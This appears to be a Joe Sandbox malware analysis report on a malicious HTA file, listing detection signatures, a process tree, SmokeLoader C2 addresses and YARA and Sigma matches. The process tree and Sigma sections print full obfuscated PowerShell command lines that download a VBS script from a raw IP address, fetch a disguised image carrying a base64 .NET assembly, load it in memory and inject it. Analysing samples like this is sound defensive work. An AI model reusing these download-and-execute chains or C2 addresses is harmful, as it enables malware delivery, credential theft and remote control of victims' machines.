Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
begoodforeverythinggreatthingsformebetterforgood.hta

Overview

General Information

Sample name:begoodforeverythinggreatthingsformebetterforgood.hta
Analysis ID:1585851
MD5:b7bd51ea4a3cbb85901f5e467009beaa
SHA1:2daa4cd4c7eca9c42ff00e7d1a4e027f55b836bc
SHA256:4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073
Tags:htauser-lontze7
Infos:

Detection

Cobalt Strike, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7452 cmdline: mshta.exe "C:\Users\user\Desktop\begoodforeverythinggreatthingsformebetterforgood.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7520 cmdline: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7608 cmdline: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 7900 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • aspnet_compiler.exe (PID: 5816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 7272 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 7788 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 7868 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 7968 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 7912 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                  • WerFault.exe (PID: 7676 cmdline: C:\Windows\system32\WerFault.exe -u -p 7912 -s 420 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
                • explorer.exe (PID: 7944 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 7728 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 7568 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 6100 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • icgfugf (PID: 7700 cmdline: C:\Users\user\AppData\Roaming\icgfugf MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • icgfugf (PID: 5844 cmdline: C:\Users\user\AppData\Roaming\icgfugf MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
SourceRuleDescriptionAuthorStrings
begoodforeverythinggreatthingsformebetterforgood.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
        0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          Click to see the 8 entries
          SourceRuleDescriptionAuthorStrings
          13.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            8.2.powershell.exe.643a1f0.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              SourceRuleDescriptionAuthorStrings
              amsi32_7948.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , ProcessId: 7900, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAg